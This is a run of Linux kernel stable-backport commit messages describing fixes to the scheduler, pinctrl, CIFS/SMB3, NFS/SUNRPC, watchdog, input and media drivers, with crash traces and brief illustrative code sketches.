commit b60205c7c5 upstream.
While going through enqueue/dequeue to review the movement of
set_curr_task() I noticed that the (2nd) update_min_vruntime() call in
dequeue_entity() is suspect.
It turns out it's actually wrong because it will consider
cfs_rq->curr, which could be the entry we just normalized. This mixes
different vruntime forms and leads to failure.
The purpose of the second update_min_vruntime() is to move
min_vruntime forward if the entity we just removed is the one that was
holding it back; _except_ for the DEQUEUE_SAVE case, because then we
know it's a temporary removal and it will come back.
However, since we do put_prev_task() _after_ dequeue(), cfs_rq->curr
will still be set (and per the above, can be transformed into a
different unit), so update_min_vruntime() should also consider
curr->on_rq. This also fixes another corner case where the enqueue
(which also does update_curr()->update_min_vruntime()) happens on the
rq->lock break in schedule(), between dequeue and put_prev_task.
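In code, the spirit of the change is that the second update_min_vruntime()
may fold in curr's vruntime only while curr is still queued; a sketch of the
added condition (names as in kernel/sched/fair.c, not the full diff):

    if (cfs_rq->curr && cfs_rq->curr->on_rq)
            vruntime = min_vruntime(vruntime, cfs_rq->curr->vruntime);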
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Mike Galbraith <efault@gmx.de>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: linux-kernel@vger.kernel.org
Fixes: 1e87623178 ("sched: Fix ->min_vruntime calculation in dequeue_entity()")
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b5a9b34078 upstream.
A scheduler performance regression has been reported by Joseph Salisbury,
which he bisected back to:
3d30544f02 ("sched/fair: Apply more PELT fixes")
The regression triggers when several levels of task groups are involved
(read: SystemD) and cpu_possible_mask != cpu_present_mask.
The root cause is that group entity's load (tg_child->se[i]->avg.load_avg)
is initialized to scale_load_down(se->load.weight). During the creation of
a child task group, its group entities on possible CPUs are attached to
parent's cfs_rq (tg_parent) and their loads are added to the parent's load
(tg_parent->load_avg) with update_tg_load_avg().
But only the load on online CPUs will then be updated to reflect real load,
whereas load on other CPUs will stay at the initial value.
The result is a tg_parent->load_avg that is higher than the real load, the
weight of group entities (tg_parent->se[i]->load.weight) on online CPUs is
smaller than it should be, and the task group gets less running time than
it could expect.
( This situation can be detected with /proc/sched_debug. The ".tg_load_avg"
of the task group will be much higher than sum of ".tg_load_avg_contrib"
of online cfs_rqs of the task group. )
The load of group entities doesn't have to be initialized to anything other
than 0, because their load will increase when an entity is attached.
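Concretely, the pre-charge becomes conditional on the entity type; a sketch
of the relevant part of init_entity_runnable_average() (hedged, not the full
function):

    struct sched_avg *sa = &se->avg;

    /* Only task entities start out charged with their weight; group
     * entities stay at 0 and gain load as entities are attached to them. */
    if (entity_is_task(se))
            sa->load_avg = scale_load_down(se->load.weight);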
Reported-by: Joseph Salisbury <joseph.salisbury@canonical.com>
Tested-by: Dietmar Eggemann <dietmar.eggemann@arm.com>
Signed-off-by: Vincent Guittot <vincent.guittot@linaro.org>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: joonwoop@codeaurora.org
Fixes: 3d30544f02 ("sched/fair: Apply more PELT fixes")
Link: http://lkml.kernel.org/r/1476881123-10159-1-git-send-email-vincent.guittot@linaro.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a171bc51fa upstream.
Initialize the spinlock before using it.
INFO: trying to register non-static key.
the code is fine but needs lockdep annotation.
turning off the locking correctness validator.
CPU: 2 PID: 1 Comm: swapper/0 Not tainted 4.8.0-dwc-bisect #4
Hardware name: Intel Corp. VALLEYVIEW C0 PLATFORM/BYT-T FFD8, BIOS BLAKFF81.X64.0088.R10.1403240443 FFD8_X64_R_2014_13_1_00 03/24/2014
0000000000000000 ffff8800788ff770 ffffffff8133d597 0000000000000000
0000000000000000 ffff8800788ff7e0 ffffffff810cfb9e 0000000000000002
ffff8800788ff7d0 ffffffff8205b600 0000000000000002 ffff8800788ff7f0
Call Trace:
[<ffffffff8133d597>] dump_stack+0x67/0x90
[<ffffffff810cfb9e>] register_lock_class+0x52e/0x540
[<ffffffff810d2081>] __lock_acquire+0x81/0x16b0
[<ffffffff810cede1>] ? save_trace+0x41/0xd0
[<ffffffff810d33b2>] ? __lock_acquire+0x13b2/0x16b0
[<ffffffff810cf05a>] ? __lock_is_held+0x4a/0x70
[<ffffffff810d3b1a>] lock_acquire+0xba/0x220
[<ffffffff8136f1fe>] ? byt_gpio_get_direction+0x3e/0x80
[<ffffffff81631567>] _raw_spin_lock_irqsave+0x47/0x60
[<ffffffff8136f1fe>] ? byt_gpio_get_direction+0x3e/0x80
[<ffffffff8136f1fe>] byt_gpio_get_direction+0x3e/0x80
[<ffffffff813740a9>] gpiochip_add_data+0x319/0x7d0
[<ffffffff81631723>] ? _raw_spin_unlock_irqrestore+0x43/0x70
[<ffffffff8136fe3b>] byt_pinctrl_probe+0x2fb/0x620
[<ffffffff8142fb0c>] platform_drv_probe+0x3c/0xa0
...
Based on the diff it looks like the problem was introduced in
commit 71e6ca61e8 ("pinctrl: baytrail: Register pin control handling")
but I wasn't able to verify that empirically as the parent commit
just oopsed when I tried to boot it.
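The ordering fix is simply to initialize the lock before registering the
gpio chip, since gpiochip_add_data() can already call back into
byt_gpio_get_direction(), which takes the lock. A sketch ('vg' being the
driver's private structure, as in the splat above):

    spin_lock_init(&vg->lock);               /* must precede any lock user */
    ret = gpiochip_add_data(&vg->chip, vg);  /* may use ->get_direction() */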
Cc: Cristina Ciocan <cristina.ciocan@intel.com>
Fixes: 71e6ca61e8 ("pinctrl: baytrail: Register pin control handling")
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c538b94367 upstream.
Dell XPS 13 (and maybe some others) uses a GPIO (CPU_GP_1) during suspend
to explicitly disable the USB touchscreen interrupt. This is done to prevent
a situation where the lid is closed but the touchscreen is left functional.
The pinctrl driver (wrongly) assumes it owns all pins which are owned by
the host and not locked down. It is perfectly fine for the BIOS to use those
pins as it is also considered host in this context.
What happens is that when the lid of Dell XPS 13 is closed, the BIOS
configures CPU_GP_1 low disabling the touchscreen interrupt. During resume
we restore all host owned pins to the known state which includes CPU_GP_1
and this overwrites what the BIOS has programmed there causing the
touchscreen to fail as no interrupts are reaching the CPU anymore.
Fix this by restoring only those pins we know are explicitly requested by
the kernel one way or other.
Link: https://bugzilla.kernel.org/show_bug.cgi?id=176361
Reported-by: AceLan Kao <acelan.kao@canonical.com>
Tested-by: AceLan Kao <acelan.kao@canonical.com>
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit caef78b6cd upstream.
Some time ago, we brought our UV BIOS callback code up to speed with the
new EFI memory mapping scheme, in commit:
d1be84a232 ("x86/uv: Update uv_bios_call() to use efi_call_virt_pointer()")
By leveraging some changes that I made to a few of the EFI runtime
callback mechanisms, in commit:
80e7559607 ("efi: Convert efi_call_virt() to efi_call_virt_pointer()")
This got everything running smoothly on UV, with the new EFI mapping
code. However, this left one, small loose end, in that EFI_OLD_MEMMAP
(a.k.a. efi=old_map) will no longer work on UV, on kernels that include
the aforementioned changes.
At the time this was not a major issue (in fact, it still really isn't),
but there's no reason that EFI_OLD_MEMMAP *shouldn't* work on our
systems. This commit adds a check into uv_bios_call(), to see if we have
the EFI_OLD_MEMMAP bit set in efi.flags. If it is set, we fall back to
using our old callback method, which uses efi_call() directly on the __va()
of our function pointer.
Signed-off-by: Alex Thorlton <athorlton@sgi.com>
Acked-by: Matt Fleming <matt@codeblueprint.co.uk>
Cc: Andy Lutomirski <luto@kernel.org>
Cc: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Brian Gerst <brgerst@gmail.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Cc: Dimitri Sivanich <sivanich@sgi.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Josh Poimboeuf <jpoimboe@redhat.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Masahiro Yamada <yamada.masahiro@socionext.com>
Cc: Mike Travis <travis@sgi.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Russ Anderson <rja@sgi.com>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: linux-efi@vger.kernel.org
Link: http://lkml.kernel.org/r/1476928131-170101-1-git-send-email-athorlton@sgi.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 24df1483c2 upstream.
Clean up some missing memory frees in some cifs ioctls, and
clarify others to make it more obvious that no data is returned.
Signed-off-by: Steve French <smfrench@gmail.com>
Acked-by: Sachin Prabhu <sprabhu@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 18dd8e1a65 upstream.
[CIFS] We had cases where we sent an SMB2/SMB3 setinfo request with all
timestamp (and DOS attribute) fields marked as 0 (i.e. do not change),
e.g. on chmod or chown.
Signed-off-by: Steve French <steve.french@primarydata.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9742805d6b upstream.
In debugging smb3, it is useful to display the number
of credits available, so we can see when the server has not granted
sufficient operations for the client to make progress, or alternatively
the client has requested too many credits (as we saw in a recent bug)
so we can compare with the number of credits the server thinks
we have.
Add a /proc/fs/cifs/DebugData line to display the client's view
of how many credits are available.
Signed-off-by: Steve French <steve.french@primarydata.com>
Reported-by: Germano Percossi <germano.percossi@citrix.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3afca265b5 upstream.
Remove the global file_list_lock to simplify cifs/smb3 locking and
have spinlocks that more closely match the information they are
protecting.
Add new tcon->open_file_lock and file->file_info_lock spinlocks.
Locks continue to follow a hierarchy,
cifs_socket --> cifs_ses --> cifs_tcon --> cifs_file
where the global tcp_ses_lock still protects socket and cifs_ses, while
the newer locks protect the lower level structures' information
(tcon and cifs_file respectively).
Signed-off-by: Steve French <steve.french@primarydata.com>
Signed-off-by: Pavel Shilovsky <pshilov@microsoft.com>
Reviewed-by: Aurelien Aptel <aaptel@suse.com>
Reviewed-by: Germano Percossi <germano.percossi@citrix.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 94f8737175 upstream.
When we open a durable handle we give a Globally Unique
Identifier (GUID) to the server which we must keep for later reference
e.g. when reopening persistent handles on reconnection.
Without this the GUID generated for a new persistent handle was lost and
16 zero bytes were used instead on re-opening.
Signed-off-by: Aurelien Aptel <aaptel@suse.com>
Signed-off-by: Steve French <smfrench@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7d414f396c upstream.
The kernel client requests 2 credits for many operations even though
they only use 1 credit (presumably to build up a buffer of credit).
Some servers seem to give the client as much credit as is requested. In
this case, the amount of credit the client has continues increasing to
the point where (server->credits * MAX_BUFFER_SIZE) overflows in
smb2_wait_mtu_credits().
Fix this by throttling the credit requests if a set limit is reached.
For async requests where the credit charge may be > 1, request as much
credit as is charged.
The limit is chosen somewhat arbitrarily. The Windows client
defaults to 128 credits, the Windows server allows clients up to
512 credits (or 8192 for Windows 2016), and the NetApp server
(and at least one other) does not limit clients at all.
Choose a high enough value such that the client shouldn't limit
performance.
This behavior was seen with a NetApp filer (NetApp Release 9.0RC2).
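A sketch of the throttling idea (the cap name, value and helper are
illustrative, not the exact cifs.ko symbols):

    #define ILLUSTRATIVE_CREDIT_CAP 128     /* e.g. what the Windows client uses */

    static unsigned int credits_to_request(int held_credits, unsigned int charge)
    {
            if (charge > 1)                         /* async, multi-credit op */
                    return charge;                  /* ask for what we consume */
            if (held_credits >= ILLUSTRATIVE_CREDIT_CAP)
                    return 1;                       /* stop building up credit */
            return 2;                               /* default: small buffer */
    }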
Signed-off-by: Ross Lagerwall <ross.lagerwall@citrix.com>
Signed-off-by: Steve French <smfrench@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 89f39af129 upstream.
Change thaw_super() to check frozen != SB_FREEZE_COMPLETE rather than
frozen == SB_UNFROZEN, otherwise it can race with freeze_super() which
drops sb->s_umount after SB_FREEZE_WRITE to preserve the lock ordering.
In this case thaw_super() will wrongly call s_op->unfreeze_fs() before
it was actually frozen, and call sb_freeze_unlock() which leads to the
unbalanced percpu_up_write(). Unfortunately lockdep can't detect this,
so this triggers misc BUG_ON()'s in kernel/rcu/sync.c.
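The essence of the change in thaw_super() (sketch):

    /* Before, thaw was refused only for a completely unfrozen sb
     * (frozen == SB_UNFROZEN), so a partially frozen sb slipped through.
     * Now refuse anything that has not reached SB_FREEZE_COMPLETE. */
    if (sb->s_writers.frozen != SB_FREEZE_COMPLETE) {
            up_write(&sb->s_umount);
            return -EINVAL;
    }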
Reported-and-tested-by: Nikolay Borisov <kernel@kyup.com>
Signed-off-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7798bf2140 upstream.
On faulting sigreturn we do get SIGSEGV, all right, but anything
we'd put into pt_regs could end up in the coredump. And since
__copy_from_user() never zeroed on arc, we'd better bugger off
on its failure without copying random uninitialized bits of
kernel stack into pt_regs...
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cb96408da4 upstream.
SCTLR_EL2.SPAN bit controls what happens with the PSTATE.PAN bit on an
exception. However, this bit has no effect on the PSTATE.PAN when
HCR_EL2.E2H or HCR_EL2.TGE is unset. Thus, when VHE is used and an
exception is taken from a guest, the PSTATE.PAN bit is left unchanged and
we continue with the value the guest has set.
To address that, always reset PSTATE.PAN on entry from EL1.
Fixes: 1f364c8c48 ("arm64: VHE: Add support for running Linux in EL2 mode")
Signed-off-by: Vladimir Murzin <vladimir.murzin@arm.com>
Reviewed-by: James Morse <james.morse@arm.com>
Acked-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Christoffer Dall <christoffer.dall@linaro.org>
[ rebased for v4.7+ ]
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4d486e0083 upstream.
Commit 0e6e01ff69 ("CPM/QE: use genalloc to manage CPM/QE muram")
has changed the way muram is managed.
genalloc uses kmalloc(), hence requires the SLAB to be up and running.
On powerpc 8xx, cpm_reset() is called early during startup.
cpm_reset() then calls cpm_muram_init() before SLAB is available,
hence the following Oops.
cpm_reset() cannot be called during initcalls because the CPM is
needed for console.
This patch removes the call to cpm_muram_init() from cpm_reset().
cpm_muram_init() will be called from a new function called cpm_init()
which is declared as subsys_initcall, unless cpm_muram_alloc() is
called earlier for the serial console in which case cpm_muram_init()
will be called from there.
The reason for calling it from two places is that some drivers
(e.g. i2c-cpm) need some of the initialisations done by
cpm_muram_init() but don't call cpm_muram_alloc(). The console
driver calls cpm_muram_alloc() but some platforms might not use
the CPM serial ports for console.
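The deferred call then takes the shape of a standard subsys_initcall
(sketch, ignoring the 'already initialised from the console path'
bookkeeping):

    #include <linux/init.h>

    static int __init cpm_init(void)
    {
            return cpm_muram_init();
    }
    subsys_initcall(cpm_init);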
[ 0.000000] Unable to handle kernel paging request for data at address 0x00000008
[ 0.000000] Faulting instruction address: 0xc01acce0
[ 0.000000] Oops: Kernel access of bad area, sig: 11 [#1]
[ 0.000000] PREEMPT CMPC885
[ 0.000000] CPU: 0 PID: 0 Comm: swapper Not tainted 4.4.14-g0886ed8 #5
[ 0.000000] task: c05183e0 ti: c0536000 task.ti: c0536000
[ 0.000000] NIP: c01acce0 LR: c0011068 CTR: 00000000
[ 0.000000] REGS: c0537e50 TRAP: 0300 Not tainted (4.4.14-s3k-dev-g0886ed8-svn)
[ 0.000000] MSR: 00001032 <ME,IR,DR,RI> CR: 28044428 XER: 00000000
[ 0.000000] DAR: 00000008 DSISR: c0000000
GPR00: c0011068 c0537f00 c05183e0 00000000 00009000 ffffffff 00000bc0 ffffffff
GPR08: ff003000 ff00b000 ff003bbf 00000000 22044422 100d43a8 00000000 07ff94e8
GPR16: 00000000 07bb5d70 00000000 07ff81f4 07ff81f4 07ff81f4 00000000 00000000
GPR24: 07ffb3a0 07fe7628 c0550000 c7ffa190 c0540000 ff003bbf 00000000 00000001
[ 0.000000] NIP [c01acce0] gen_pool_add_virt+0x14/0xdc
[ 0.000000] LR [c0011068] cpm_muram_init+0xd4/0x18c
[ 0.000000] Call Trace:
[ 0.000000] [c0537f00] [00000200] 0x200 (unreliable)
[ 0.000000] [c0537f20] [c0011068] cpm_muram_init+0xd4/0x18c
[ 0.000000] [c0537f70] [c0494684] cpm_reset+0xb4/0xc8
[ 0.000000] [c0537f90] [c0494c64] cmpc885_setup_arch+0x10/0x30
[ 0.000000] [c0537fa0] [c0493cd4] setup_arch+0x130/0x168
[ 0.000000] [c0537fb0] [c04906bc] start_kernel+0x88/0x380
[ 0.000000] [c0537ff0] [c0002224] start_here+0x38/0x98
[ 0.000000] Instruction dump:
[ 0.000000] 91430010 91430014 80010014 83e1000c 7c0803a6 38210010 4e800020 7c0802a6
[ 0.000000] 9421ffe0 bf61000c 90010024 7c7e1b78 <80630008> 7c9c2378 7cc31c30 3863001f
[ 0.000000] ---[ end trace dc8fa200cb88537f ]---
Fixes: 0e6e01ff69 ("CPM/QE: use genalloc to manage CPM/QE muram")
Signed-off-by: Christophe Leroy <christophe.leroy@c-s.fr>
[scottwood: Removed some string changes unrelated to bugfix]
Signed-off-by: Scott Wood <oss@buserror.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5dc6f3fede upstream.
of_mm_gpiochip_add_data() calls mm_gc->save_regs() before
setting the data. Therefore ->save_regs() cannot use
gpiochip_get_data().
An Oops is encountered without this fix.
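Because the data pointer is not set yet when ->save_regs() runs, the
callback has to fall back to container_of(); a sketch (struct name as in the
qe_lib gpio driver, register snapshotting elided):

    static void qe_gpio_save_regs(struct of_mm_gpio_chip *mm_gc)
    {
            struct qe_gpio_chip *qe_gc =
                    container_of(mm_gc, struct qe_gpio_chip, mm_gc);

            /* ... snapshot the pin registers using qe_gc, not
             * gpiochip_get_data(&mm_gc->gc) ... */
    }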
Fixes: 1e714e54b5 ("powerpc: qe_lib-gpio: use gpiochip data pointer")
Signed-off-by: Christophe Leroy <christophe.leroy@c-s.fr>
Reviewed-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Scott Wood <oss@buserror.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 35d04077ad upstream.
The definition of atomic_dec_if_positive() assumes that
atomic_sub_if_positive() exists, which is only the case if
metag specific atomics are used. This results in the following
build error when trying to build metag1_defconfig.
kernel/ucount.c: In function 'dec_ucount':
kernel/ucount.c:211: error:
implicit declaration of function 'atomic_sub_if_positive'
Moving the definition of atomic_dec_if_positive() into the metag
conditional code fixes the problem.
Fixes: 6006c0d8ce ("metag: Atomics, locks and bitops")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8355b3f944 upstream.
Commit 0254e95353 ("watchdog: Drop pointer to watchdog device from
struct watchdog_device") removed the dev pointer from struct
watchdog_device, but this driver was still assigning it, leading to
a compilation error:
drivers/watchdog/mt7621_wdt.c: In function 'mt7621_wdt_probe':
drivers/watchdog/mt7621_wdt.c:142:16: error:
'struct watchdog_device' has no member named 'dev'
Fix this by removing the assignment.
Fixes: 0254e95353 ("watchdog: Drop pointer to watchdog device ...")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Wim Van Sebroeck <wim@iguana.be>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit df9c692b56 upstream.
Commit 0254e95353 ("watchdog: Drop pointer to watchdog device from
struct watchdog_device") removed the dev pointer from struct
watchdog_device, but this driver was still assigning it, leading to a
compilation error:
drivers/watchdog/rt2880_wdt.c: In function ‘rt288x_wdt_probe’:
drivers/watchdog/rt2880_wdt.c:161:16: error: ‘struct watchdog_device’
has no member named ‘dev’
rt288x_wdt_dev.dev = &pdev->dev;
^
scripts/Makefile.build:289: recipe for target
'drivers/watchdog/rt2880_wdt.o' failed
Fix this by removing the assignment.
Fixes: 0254e95353 ("watchdog: Drop pointer to watchdog device ...")
Signed-off-by: Matt Redfearn <matt.redfearn@imgtec.com>
Reviewed-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Wim Van Sebroeck <wim@iguana.be>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a3f9d1b58a upstream.
Commit 41963c10c4 sets the block layout's
last written byte to the offset of the end of the extent rather than the
end of the write, which incorrectly updates the inode's size for
partial-page writes.
Fixes: 41963c10c4 ("pnfs/blocklayout: update last_write_offset atomically with extents")
Signed-off-by: Benjamin Coddington <bcodding@redhat.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Tested-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7dc72d5f7a upstream.
Due to inode number reuse in filesystems, we can end up corrupting the
inode on our client if we apply the file attributes without ensuring that
the filehandle matches.
Typical symptoms include spurious "mode changed" reports in the syslog.
We still do want to ensure that we don't invalidate the dentry if the
inode number matches, but we don't have a filehandle.
Fixes: fa9233699c ("NFS: Don't require a filehandle to refresh...")
Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
Tested-by: Oleg Drokin <green@linuxhacker.ru>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1eca45f8a8 upstream.
By design a notifier can be registered only once, but nfsd registers the
same inetaddr notifiers once per net namespace. When this happens it
corrupts the list of notifiers; as a result some notifiers are not called
on the proper event, traversing the list can loop forever, and a second
unregister can access already freed memory.
Fixes: 36684996 ("nfsd: Register callbacks on the inetaddr_chain and inet6addr_chain")
Signed-off-by: Vasily Averin <vvs@virtuozzo.com>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d48f9ce73c upstream.
Write space becoming available may race with putting the task to sleep
in xprt_wait_for_buffer_space(). The existing mechanism to avoid the
race does not work.
This (edited) partial trace illustrates the problem:
[1] rpc_task_run_action: task:43546@5 ... action=call_transmit
[2] xs_write_space <-xs_tcp_write_space
[3] xprt_write_space <-xs_write_space
[4] rpc_task_sleep: task:43546@5 ...
[5] xs_write_space <-xs_tcp_write_space
[1] Task 43546 runs but is out of write space.
[2] Space becomes available, xs_write_space() clears the
SOCKWQ_ASYNC_NOSPACE bit.
[3] xprt_write_space() attempts to wake xprt->snd_task (== 43546), but
this has not yet been queued and the wake up is lost.
[4] xs_nospace() is called which calls xprt_wait_for_buffer_space()
which queues task 43546.
[5] The call to sk->sk_write_space() at the end of xs_nospace() (which
is supposed to handle the above race) does not call
xprt_write_space() as the SOCKWQ_ASYNC_NOSPACE bit is clear and
thus the task is not woken.
Fix the race by resetting the SOCKWQ_ASYNC_NOSPACE bit in xs_nospace()
so the second call to sk->sk_write_space() calls xprt_write_space().
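A rough sketch of the race breaker described above; where exactly the
SOCKWQ_ASYNC_NOSPACE flag lives differs between kernel versions, so the
field access below is an assumption rather than the exact upstream code.

  /* Hypothetical sketch: re-set the NOSPACE bit before kicking the socket */
  static void xs_nospace_race_breaker(struct sock *sk)
  {
      struct socket_wq *wq;

      rcu_read_lock();
      wq = rcu_dereference(sk->sk_wq);
      if (wq)
          set_bit(SOCKWQ_ASYNC_NOSPACE, &wq->flags);   /* assumed location */
      rcu_read_unlock();

      /* the write-space callback now calls xprt_write_space() and wakes
       * the task queued in step [4] instead of bailing out early */
      sk->sk_write_space(sk);
  }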
Suggested-by: Trond Myklebust <trondmy@primarydata.com>
Signed-off-by: David Vrabel <david.vrabel@citrix.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f9a703a54d upstream.
Just like Fujitsu CELSIUS H730, the H760 also has an Elantech touchpad with
the same quirks. Without this patch, the touchpad is useless out-of-the-box
as the mouse pointer won't move.
This patch makes the driver aware of both the crc_enabled=1 requirement and
the middle button, making the touchpad fully functional out-of-the-box.
Signed-off-by: Matti Kurkela <Matti.Kurkela@iki.fi>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 930e19248e upstream.
On a suspend/resume cycle, a selftest is executed to reset the i8042
controller. But when this is done on Asus devices, subsequent calls to the
elantech driver's detect/init functions fail. Skipping the selftest fixes
this problem.
An easier way to reproduce this problem is adding i8042.reset=1 as a
kernel parameter. On Asus laptops, it'll make the system start with the
touchpad already stuck, since psmouse_probe forcibly calls the selftest
function.
This patch was inspired by John Hiesey's change[1], but, since this problem
affects a lot of models of Asus, let's avoid running selftests on them.
All models affected by this problem:
A455LD
K401LB
K501LB
K501LX
R409L
V502LX
X302LA
X450LCP
X450LD
X455LAB
X455LDB
X455LF
Z450LA
[1]: https://marc.info/?l=linux-input&m=144312209020616&w=2
Fixes: "ETPS/2 Elantech Touchpad dies after resume from suspend"
(https://bugzilla.kernel.org/show_bug.cgi?id=107971)
Signed-off-by: Marcos Paulo de Souza <marcos.souza.org@gmail.com>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 034827c727 upstream.
The native ABI vDSO linker script vdso.lds is built by preprocessing
vdso.lds.S, with the native -mabi flag passed in to get the correct ABI
definitions. Unfortunately however certain toolchains choke on -mabi=64
without a corresponding compatible -march flag, for example:
cc1: error: ‘-march=mips32r2’ is not compatible with the selected ABI
scripts/Makefile.build:338: recipe for target 'arch/mips/vdso/vdso.lds' failed
Fix this by including ccflags-vdso in the KBUILD_CPPFLAGS for vdso.lds,
which includes the appropriate -march flag.
Fixes: ebb5e78cc6 ("MIPS: Initial implementation of a VDSO")
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Reviewed-by: Maciej W. Rozycki <macro@imgtec.com>
Cc: linux-mips@linux-mips.org
Patchwork: https://patchwork.linux-mips.org/patch/14368/
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4875a5f721 upstream.
On a Dell laptop, there are no global ADCs for all input devices, so the
input devices use different ADCs; as a result, dyn_adc_switch is set to
true.
In this situation, it is safe to control the micmute led according to
user's choice of muting/unmuting the current input device, since only
current input device path is active, while other input device paths
are inactive and powered down.
Fixes: 00ef99408b ('ALSA: hda - add mic mute led hook for dell machines')
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 461af077d3 upstream.
The driver should not ignore errors while registering the I2C bus: this
device can't even minimally work without the buses, as it uses them
internally to talk to the several IP blocks inside the chip.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 24b923f073 upstream.
This device uses GPIO 28 to switch between analog and digital modes: in
digital mode, it should be set to 1.
The code that sets it in analog mode is OK, but it misses the logic that
sets it in digital mode.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1871d718a9 upstream.
The cx231xx_set_agc_analog_digital_mux_select() callers
expect it to return 0 or an error. Returning a positive value
makes the first attempt to switch between analog/digital to fail.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 505a0ea706 upstream.
With the current settings, only one channel locks properly.
That's likely because, when this driver was written, Brazil
was still using experimental transmissions.
Change it to reproduce the settings used by the newer drivers.
That makes it lock on other channels.
Tested with both PixelView SBTVD Hybrid (cx231xx-based) and
C3Tech Digital Duo HDTV/SDTV (em28xx-based) devices.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dafb65fb98 upstream.
On this frontend, it takes a while to start outputting normal
TS data. That only happens on state S9. On S8, the TS output
is enabled, but it is not reliable enough.
However, the zigzag loop is too fast to let it sync.
As, in practical tests, the zigzag software loop doesn't seem to help and
just slows down the tuning, switch to the hardware algorithm, as the
tuners used on such devices are capable of working with frequency drifts
without any help from software.
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8b326c61de upstream.
